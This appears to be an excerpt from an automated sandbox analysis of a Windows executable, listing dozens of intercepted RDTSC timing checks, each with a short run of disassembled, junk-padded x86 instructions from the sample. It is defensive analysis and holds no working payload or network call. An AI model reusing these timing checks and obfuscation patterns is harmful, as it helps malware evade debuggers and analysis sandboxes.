Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F808C9 second address: 6F8093D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CB4FA4D21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+34h], eax 0x0000000c jmp 00007F1CB4FA4D1Eh 0x00000011 mov eax, dword ptr [ebx+18h] 0x00000014 jmp 00007F1CB4FA4D20h 0x00000019 mov dword ptr [esi+38h], eax 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f mov edx, 420DEE50h 0x00000024 pushfd 0x00000025 jmp 00007F1CB4FA4D29h 0x0000002a sub ch, FFFFFFD6h 0x0000002d jmp 00007F1CB4FA4D21h 0x00000032 popfd 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F8093D second address: 6F80993 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CB4F79651h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+1Ch] 0x0000000c jmp 00007F1CB4F7964Eh 0x00000011 mov dword ptr [esi+3Ch], eax 0x00000014 jmp 00007F1CB4F79650h 0x00000019 mov eax, dword ptr [ebx+20h] 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f pushad 0x00000020 popad 0x00000021 call 00007F1CB4F79653h 0x00000026 pop esi 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F80993 second address: 6F8099A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, F4h 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F8099A second address: 6F809E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esi+40h], eax 0x0000000a jmp 00007F1CB4F7964Dh 0x0000000f lea eax, dword ptr [ebx+00000080h] 0x00000015 jmp 00007F1CB4F7964Eh 0x0000001a push 00000001h 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F1CB4F79657h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F809E0 second address: 6F809F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1CB4FA4D24h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F809F8 second address: 6F809FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F809FC second address: 6F80A60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jmp 00007F1CB4FA4D1Ch 0x0000000e mov dword ptr [esp], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F1CB4FA4D1Dh 0x0000001a xor esi, 483E11C6h 0x00000020 jmp 00007F1CB4FA4D21h 0x00000025 popfd 0x00000026 pushfd 0x00000027 jmp 00007F1CB4FA4D20h 0x0000002c add si, 0A68h 0x00000031 jmp 00007F1CB4FA4D1Bh 0x00000036 popfd 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F80A60 second address: 6F80AA2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1CB4F7964Fh 0x00000008 mov bx, ax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e lea eax, dword ptr [ebp-10h] 0x00000011 pushad 0x00000012 pushad 0x00000013 mov al, 72h 0x00000015 mov ax, di 0x00000018 popad 0x00000019 mov ch, bl 0x0000001b popad 0x0000001c nop 0x0000001d pushad 0x0000001e mov al, F2h 0x00000020 mov ax, bx 0x00000023 popad 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F1CB4F79651h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F80AA2 second address: 6F80AA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F80AA8 second address: 6F80AAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F80AAC second address: 6F80AC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F1CB4FA4D22h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F80AC9 second address: 6F80ADB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1CB4F7964Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F80B06 second address: 6F80B1B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CB4FA4D21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F80B1B second address: 6F80B2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1CB4F7964Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F80B2B second address: 6F80B3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edi, eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F80B3B second address: 6F80B41 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F80B41 second address: 6F80B7F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CB4FA4D1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edi, edi 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F1CB4FA4D24h 0x00000012 or esi, 28FF7638h 0x00000018 jmp 00007F1CB4FA4D1Bh 0x0000001d popfd 0x0000001e push eax 0x0000001f push edx 0x00000020 mov bx, cx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F80B7F second address: 6F80BBE instructions: 0x00000000 rdtsc 0x00000002 call 00007F1CB4F79652h 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b js 00007F1D22DF8172h 0x00000011 jmp 00007F1CB4F79651h 0x00000016 mov eax, dword ptr [ebp-0Ch] 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov bx, 795Eh 0x00000020 mov edi, 3E7CCD6Ah 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F80BBE second address: 6F80BEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CB4FA4D20h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+04h], eax 0x0000000c jmp 00007F1CB4FA4D20h 0x00000011 lea eax, dword ptr [ebx+78h] 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F80BEE second address: 6F80C0B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CB4F79659h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F80C0B second address: 6F80C85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CB4FA4D21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 00000001h 0x0000000b jmp 00007F1CB4FA4D1Eh 0x00000010 nop 0x00000011 jmp 00007F1CB4FA4D20h 0x00000016 push eax 0x00000017 jmp 00007F1CB4FA4D1Bh 0x0000001c nop 0x0000001d pushad 0x0000001e mov dh, ch 0x00000020 mov ebx, 09569024h 0x00000025 popad 0x00000026 lea eax, dword ptr [ebp-08h] 0x00000029 jmp 00007F1CB4FA4D23h 0x0000002e nop 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F1CB4FA4D25h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F80C85 second address: 6F80C8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F80C8B second address: 6F80CC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F1CB4FA4D26h 0x0000000e nop 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F1CB4FA4D27h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F80CFB second address: 6F80D2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1CB4F79650h 0x00000008 mov ah, 45h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d test edi, edi 0x0000000f pushad 0x00000010 mov dh, 1Fh 0x00000012 push eax 0x00000013 push edx 0x00000014 call 00007F1CB4F79652h 0x00000019 pop esi 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F80D2D second address: 6F80D8D instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F1CB4FA4D1Bh 0x00000008 sub cx, 847Eh 0x0000000d jmp 00007F1CB4FA4D29h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 js 00007F1D22E23672h 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007F1CB4FA4D1Ch 0x00000023 sbb esi, 1D2BB778h 0x00000029 jmp 00007F1CB4FA4D1Bh 0x0000002e popfd 0x0000002f popad 0x00000030 mov eax, dword ptr [ebp-04h] 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F80D8D second address: 6F80D91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F80D91 second address: 6F80D95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F80D95 second address: 6F80D9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F80D9B second address: 6F80E59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F1CB4FA4D24h 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007F1CB4FA4D1Bh 0x0000000f add esi, 237AD49Eh 0x00000015 jmp 00007F1CB4FA4D29h 0x0000001a popfd 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e mov dword ptr [esi+08h], eax 0x00000021 pushad 0x00000022 call 00007F1CB4FA4D1Ch 0x00000027 pushfd 0x00000028 jmp 00007F1CB4FA4D22h 0x0000002d sbb cx, D5C8h 0x00000032 jmp 00007F1CB4FA4D1Bh 0x00000037 popfd 0x00000038 pop esi 0x00000039 mov dh, 30h 0x0000003b popad 0x0000003c lea eax, dword ptr [ebx+70h] 0x0000003f jmp 00007F1CB4FA4D20h 0x00000044 push 00000001h 0x00000046 jmp 00007F1CB4FA4D20h 0x0000004b nop 0x0000004c push eax 0x0000004d push edx 0x0000004e jmp 00007F1CB4FA4D27h 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F80E59 second address: 6F80EC2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CB4F79659h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov si, bx 0x0000000e mov si, bx 0x00000011 popad 0x00000012 nop 0x00000013 jmp 00007F1CB4F79655h 0x00000018 lea eax, dword ptr [ebp-18h] 0x0000001b jmp 00007F1CB4F7964Eh 0x00000020 nop 0x00000021 pushad 0x00000022 mov eax, 7C2B958Dh 0x00000027 mov edi, ecx 0x00000029 popad 0x0000002a push eax 0x0000002b pushad 0x0000002c movsx edx, si 0x0000002f mov esi, 24F9FBFDh 0x00000034 popad 0x00000035 nop 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F80EC2 second address: 6F80EC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F80EC6 second address: 6F80ECC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F80F1A second address: 6F80FBD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F1CB4FA4D26h 0x00000009 add esi, 0B4853F8h 0x0000000f jmp 00007F1CB4FA4D1Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 test edi, edi 0x0000001a pushad 0x0000001b mov di, ax 0x0000001e pushfd 0x0000001f jmp 00007F1CB4FA4D20h 0x00000024 and esi, 78BD2E58h 0x0000002a jmp 00007F1CB4FA4D1Bh 0x0000002f popfd 0x00000030 popad 0x00000031 js 00007F1D22E23452h 0x00000037 pushad 0x00000038 jmp 00007F1CB4FA4D24h 0x0000003d pushfd 0x0000003e jmp 00007F1CB4FA4D22h 0x00000043 or eax, 74DDBFE8h 0x00000049 jmp 00007F1CB4FA4D1Bh 0x0000004e popfd 0x0000004f popad 0x00000050 mov eax, dword ptr [ebp-14h] 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F80FBD second address: 6F80FC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F80FC1 second address: 6F80FC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F80FC5 second address: 6F80FCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F80FCB second address: 6F81008 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CB4FA4D1Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F1CB4FA4D1Dh 0x00000014 or si, 1CB6h 0x00000019 jmp 00007F1CB4FA4D21h 0x0000001e popfd 0x0000001f mov si, A2A7h 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F81008 second address: 6F8109C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CB4F7964Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+0Ch], eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F1CB4F7964Ch 0x00000013 jmp 00007F1CB4F79655h 0x00000018 popfd 0x00000019 pushfd 0x0000001a jmp 00007F1CB4F79650h 0x0000001f sbb cl, 00000068h 0x00000022 jmp 00007F1CB4F7964Bh 0x00000027 popfd 0x00000028 popad 0x00000029 mov edx, 74E806ECh 0x0000002e pushad 0x0000002f mov al, 96h 0x00000031 pushfd 0x00000032 jmp 00007F1CB4F79651h 0x00000037 xor eax, 16D92B86h 0x0000003d jmp 00007F1CB4F79651h 0x00000042 popfd 0x00000043 popad 0x00000044 sub eax, eax 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a pushad 0x0000004b popad 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F8109C second address: 6F810A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F810A0 second address: 6F810A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F810A6 second address: 6F810E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CB4FA4D1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lock cmpxchg dword ptr [edx], ecx 0x0000000d jmp 00007F1CB4FA4D26h 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F1CB4FA4D27h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F810E9 second address: 6F81101 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1CB4F79654h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F81101 second address: 6F81136 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CB4FA4D1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test eax, eax 0x0000000d pushad 0x0000000e pushad 0x0000000f mov dh, cl 0x00000011 movsx edi, si 0x00000014 popad 0x00000015 movzx eax, dx 0x00000018 popad 0x00000019 jne 00007F1D22E232D2h 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F1CB4FA4D1Eh 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F81136 second address: 6F81148 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1CB4F7964Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F81148 second address: 6F8114C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F8114C second address: 6F8115D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edx, dword ptr [ebp+08h] 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e mov ax, dx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F8115D second address: 6F81161 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F81161 second address: 6F811C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov edx, 523CDA08h 0x0000000b popad 0x0000000c mov eax, dword ptr [esi] 0x0000000e jmp 00007F1CB4F79657h 0x00000013 mov dword ptr [edx], eax 0x00000015 pushad 0x00000016 mov cx, B38Bh 0x0000001a jmp 00007F1CB4F79650h 0x0000001f popad 0x00000020 mov eax, dword ptr [esi+04h] 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 call 00007F1CB4F7964Dh 0x0000002b pop eax 0x0000002c jmp 00007F1CB4F79651h 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F811C4 second address: 6F8120A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CB4FA4D21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+04h], eax 0x0000000c pushad 0x0000000d push ecx 0x0000000e mov dh, 95h 0x00000010 pop ecx 0x00000011 mov edx, 24085458h 0x00000016 popad 0x00000017 mov eax, dword ptr [esi+08h] 0x0000001a jmp 00007F1CB4FA4D27h 0x0000001f mov dword ptr [edx+08h], eax 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F8120A second address: 6F8120E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F8120E second address: 6F81214 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F81214 second address: 6F81231 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, cx 0x00000006 mov edi, eax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esi+0Ch] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F1CB4F7964Dh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F81231 second address: 6F81263 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CB4FA4D21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+0Ch], eax 0x0000000c jmp 00007F1CB4FA4D1Eh 0x00000011 mov eax, dword ptr [esi+10h] 0x00000014 pushad 0x00000015 mov ax, 2A8Dh 0x00000019 push eax 0x0000001a push edx 0x0000001b mov ah, 6Ah 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F81263 second address: 6F812BD instructions: 0x00000000 rdtsc 0x00000002 mov al, bl 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [edx+10h], eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F1CB4F7964Ah 0x00000011 sbb ch, FFFFFFD8h 0x00000014 jmp 00007F1CB4F7964Bh 0x00000019 popfd 0x0000001a jmp 00007F1CB4F79658h 0x0000001f popad 0x00000020 mov eax, dword ptr [esi+14h] 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F1CB4F79657h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F812BD second address: 6F81307 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CB4FA4D29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+14h], eax 0x0000000c jmp 00007F1CB4FA4D1Eh 0x00000011 mov eax, dword ptr [esi+18h] 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F1CB4FA4D27h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F81307 second address: 6F813D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CB4F79659h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+18h], eax 0x0000000c jmp 00007F1CB4F7964Eh 0x00000011 mov eax, dword ptr [esi+1Ch] 0x00000014 pushad 0x00000015 pushad 0x00000016 movzx ecx, bx 0x00000019 mov di, 88FCh 0x0000001d popad 0x0000001e pushfd 0x0000001f jmp 00007F1CB4F79655h 0x00000024 or ax, 1C56h 0x00000029 jmp 00007F1CB4F79651h 0x0000002e popfd 0x0000002f popad 0x00000030 mov dword ptr [edx+1Ch], eax 0x00000033 jmp 00007F1CB4F7964Eh 0x00000038 mov eax, dword ptr [esi+20h] 0x0000003b jmp 00007F1CB4F79650h 0x00000040 mov dword ptr [edx+20h], eax 0x00000043 pushad 0x00000044 push ecx 0x00000045 pushfd 0x00000046 jmp 00007F1CB4F7964Dh 0x0000004b xor si, 0F16h 0x00000050 jmp 00007F1CB4F79651h 0x00000055 popfd 0x00000056 pop ecx 0x00000057 jmp 00007F1CB4F79651h 0x0000005c popad 0x0000005d mov eax, dword ptr [esi+24h] 0x00000060 pushad 0x00000061 push eax 0x00000062 push edx 0x00000063 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F813D7 second address: 6F81412 instructions: 0x00000000 rdtsc 0x00000002 call 00007F1CB4FA4D26h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F1CB4FA4D1Bh 0x0000000f popad 0x00000010 mov dword ptr [edx+24h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 call 00007F1CB4FA4D1Bh 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F81412 second address: 6F81417 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F81417 second address: 6F8145E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CB4FA4D24h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+28h] 0x0000000c jmp 00007F1CB4FA4D20h 0x00000011 mov dword ptr [edx+28h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F1CB4FA4D27h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F8145E second address: 6F814D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F1CB4F7964Fh 0x00000009 jmp 00007F1CB4F79653h 0x0000000e popfd 0x0000000f pushfd 0x00000010 jmp 00007F1CB4F79658h 0x00000015 xor ecx, 0E349E48h 0x0000001b jmp 00007F1CB4F7964Bh 0x00000020 popfd 0x00000021 popad 0x00000022 pop edx 0x00000023 pop eax 0x00000024 mov ecx, dword ptr [esi+2Ch] 0x00000027 jmp 00007F1CB4F79656h 0x0000002c mov dword ptr [edx+2Ch], ecx 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F814D5 second address: 6F814D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F814D9 second address: 6F814DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F814DF second address: 6F81516 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CB4FA4D24h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ax, word ptr [esi+30h] 0x0000000d jmp 00007F1CB4FA4D20h 0x00000012 mov word ptr [edx+30h], ax 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 mov si, D213h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F81516 second address: 6F81531 instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov ax, word ptr [esi+32h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F1CB4F7964Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F81531 second address: 6F81537 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
